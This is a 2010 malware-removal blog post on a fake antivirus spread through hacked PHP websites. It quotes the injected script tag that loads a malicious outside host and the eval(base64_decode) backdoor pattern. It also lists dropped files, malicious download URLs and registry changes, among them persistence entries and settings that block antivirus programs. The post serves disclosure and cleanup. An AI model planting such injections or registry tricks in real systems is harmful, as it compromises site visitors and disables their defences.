Subscribe to Virus Experts – We Make Your Digital Life Secured RSS FeedSubscribe to Virus Experts – We Make Your Digital Life SecuredComments FEED

Browse > Home / Removal Tips,Tools and Videos / Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware

Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware

May 9, 2010 by admin  
Filed under Removal Tips,Tools and Videos


3,273 views   Leave a Comment

 

 

Packed.Win32.Krap .an Removal tool for Mal/FakeAV BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware

 

 

 

 

Severity Level : 8/10

 

Alias:

  • Mal/FakeAV-BW [Sophos]
  • Generic FakeAlert!hr [McAfee]
  • Packed.Win32.Krap.an [Kaspersky Lab]
  • NOT Detected [Microsoft]

 

packupdate_build107_302.exe VirusTotal Report : (Click Here)

 

 

Infected Websites

This Malware is coming  from  infected website most of them hosted by GoDaddy, they Tweeted about this matter (http://twitter.com/GoDaddy/status/13199601776).

When the site got infected you will see the following line inserted just before the </body> tag  in the source of any of the PHP pages:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

 

When you examine each of the PHP pages, you see this line at the top of all of them (The hacked code):

<?php /**/ eval(base64_decode("Random Code" ));?>

 

When you decode this, it equates to:

 

malware code 1024x680 Removal tool for Mal/FakeAV BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware

 

 

Remove The hacked code from infected sites

 

Search inside all index.php and *.php files for these codes and delete it :

 

1-  <script src=http://kdjkfjskdfjlskdjf.com/kp.php></script>

 

2-  <?php /**/ eval(base64_decode(Random Code ));?>

 

Removing that from all your index and PHP files should solve the problem.

 

 

 

 

Infected PCs With ( Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an )

 

File System Modifications

The following files were created in the system:

 

  • %APPDATA%\My Security Engine\ Instructions.ini
  • %APPDATA%\My Security Engine\ winupdate.exe
  • %APPDATA%\Microsoft\Internet Explorer\Quick Launch\ My Security Engine.lnk
  • %USERPROFILE%\Desktop\ My Security Engine.lnk
  • %USERPROFILE%\Recent\ cb.drv
  • %USERPROFILE%\Recent\ CLSV.dll
  • %USERPROFILE%\Recent\ eb.dll
  • %USERPROFILE%\Recent\ eb.exe
  • %USERPROFILE%\Recent\ eb.sys
  • %USERPROFILE%\Recent\ exec.exe
  • %USERPROFILE%\Recent\ fan.dll
  • %USERPROFILE%\Recent\ fix.dll
  • %USERPROFILE%\Recent\ FW.dll
  • %USERPROFILE%\Recent\ kernel32.exe
  • %USERPROFILE%\Recent\ pal.dll
  • %USERPROFILE%\Recent\ ppal.exe
  • %USERPROFILE%\Recent\ snl2w.dll
  • %USERPROFILE%\Recent\ tjd.sys
  • %USERPROFILE%\Start Menu\My Security Engine.lnk
  • %USERPROFILE%\Start Menu\Programs\My Security Engine.lnk
  • %ALLUSERSPROFILE%\Application Data\e5adcb6\8654.mof
  • %ALLUSERSPROFILE%\Application Data\e5adcb6\MSE.ico
  • %ALLUSERSPROFILE%\Application Data\e5adcb6\MSe5ad.exe
  • %ALLUSERSPROFILE%\Application Data\e5adcb6\MSESys\vd952342.bd
  • %ALLUSERSPROFILE%\Application Data\MSJMKE\MSTSKDKCKE.cfg

 

Note:

  • %system% is a variable that refers to the System folder. By default, this is “C:\Windows\System” (Windows 95/98/Me), “C:\Winnt\System32″ (Windows NT/2000), or “C:\Windows\System32″ (Windows XP).
  • ? = Random file name.

 

Memory Modifications

There were new processes created in the system:

 

Process Name

Process Filename
winupdate.exe %APPDATA%\My Security Engine\ winupdate.exe
MSe5ad.exe %ALLUSERSPROFILE%\Application Data\e5adcb6\MSe5ad.exe


 

The following Internet action was started (the retrieved bits are saved into the local file):

 

URL to be downloaded

Filename for the downloaded bits

http://4-open-davinci.com

http://kdjkfjskdfjlskdjf.com/kp.php

 -
94.228.209.223 -

http://update2.keepinsafety.net/

http://secure2.securexzone.net/

http://secure1.guarded-payment.com/

http://report.land-protection.com/

 -

http://www4.suitcase52td.net

 packupdate_build107_302.exe

 

Registry Modifications

The newly created or modified Registry Value is:

 

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler]

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler]
@=”Implements DocHostUIHandler”

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler\Clsid]

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler\Clsid]
@=”{3F2BBC05-40DF-11D2-9455-00104BC936FF}”

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]
@=”Implements DocHostUIHandler”

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]
@=”C:\\DOCUME~1\\ALLUSE~1.WIN\\APPLIC~1\\e5adcb6\\MSe5ad.exe”

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]
@=”MSe5ad.DocHostUIHandler”

[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer]

[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer\SearchScopes]

[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer\SearchScopes]
“URL”=”http://findgala.com/?&uid=2045&q={searchTerms}”

[HKEY_CURRENT_USER\Software\3]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“IIL”=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“ltHI”=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“ltTST”=dword:0000ba3e

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“PRS”=”http://127.0.0.1:27777/?inj=%ORIGINAL%”

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation]
“MSCompatibilityMode”=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“Enable”=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“Size”=dword:0000000a

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“InitHits”=dword:00000064

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“Factor”=dword:00000014

[HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\88AA5029C7E29F56EE18C3764A808C2A6CE0BE8E]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
“HRZR_EHACNGU:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Qrfxgbc\\cnpxhcqngr_ohvyq106_2045.rkr”=hex:01,00,00,00,06,00,00,00,c0,57,8f,87,79,ef,ca,01,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
“HRZR_EHACVQY:%pfvqy2%\\Zl Frphevgl Ratvar.yax”=hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
“HRZR_EHACVQY:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Fgneg Zrah\\Zl Frphevgl Ratvar.yax”=hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
“UID”=”2045″

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]
“969903903″=”"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]
“Version/12.02045″=”"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“My Security Engine”=”\”C:\\Documents and Settings\\All Users.WINDOWS\\Application Data\\e5adcb6\\MSe5ad.exe\” /s /d”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\Documents and Settings\\Administrator\\Desktop\\packupdate_build106_2045.exe”=”packupdate_build106_2045″

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\taskkill.exe”=”Kill Process”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\Documents and Settings\\All Users.WINDOWS\\Application Data\\e5adcb6\\MSe5ad.exe”=”MSe5ad”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\System32\\Wbem\\mofcomp.exe”=”mofcomp”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\netsh.exe”=”Network Command Shell”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\cmd.exe”=”Windows Command Processor”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\Documents and Settings\\Administrator\\Application Data\\My Security Engine\\winupdate.exe”=”winupdate”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\ntvdm.exe”=”NTVDM.EXE”

[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer]

[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer\SearchScopes]

[HKEY_CURRENT_USER\Software\Classes\Software\Microsoft\Internet Explorer\SearchScopes]
“URL”=”http://findgala.com/?&uid=2045&q={searchTerms}”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler]
@=”Implements DocHostUIHandler”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler\Clsid]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSe5ad.DocHostUIHandler\Clsid]
@=”{3F2BBC05-40DF-11D2-9455-00104BC936FF}”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]
@=”Implements DocHostUIHandler”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]
@=”C:\\DOCUME~1\\ALLUSE~1.WIN\\APPLIC~1\\e5adcb6\\MSe5ad.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]
@=”MSe5ad.DocHostUIHandler”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“EnableFileTracing”=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“EnableConsoleTracing”=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“FileTracingMask”=dword:ffff0000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“ConsoleTracingMask”=dword:ffff0000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“MaxFileSize”=dword:00100000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\FWCFG]
“FileDirectory”=hex(2):25,77,69,6e,64,69,72,25,5c,74,72,61,63,69,6e,67,00,

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AAWTray.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\About.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ackwin32.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ackwin32.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ad-Aware.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adaware.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\advxdwin.exe]
“Debugger”=”svchost.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe]
“Debugger”=”svchost.exe”
.

.

.

etc.


 

 

Removal Tools :


1 – Download the free version of Malwarebytes that provided by www.malwarebytes.org from Here.

2 – Download MicrosoftFixit50267.msi to fix hosts file from Here.

 


 

For any help contact us.
VirusExperts.org TEAM


%Temp%\cvasds0.dll
%Temp%\cvasds1.dll
%Temp%\cvasds2.dll


Related posts:

  1. Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware
  2. Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware
  3. Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM
  4. Removal tool for Win32.Genome.aocx (outlook.exe, brazilian.exe, sysinternals.exe) Trojan-Downloader
  5. Removal tool for Sus/Delf-J, Trojan.Heur.GZ.kGX@bKStsDeG (Foto_253.com, javahr.exe, javahr2.exe, javahu.exe) Trojan

Tags: , , , , , , , , , , ,

Speak Your Mind

Tell us what you're thinking...
and oh, if you want a pic to show with your comment, go get a gravatar!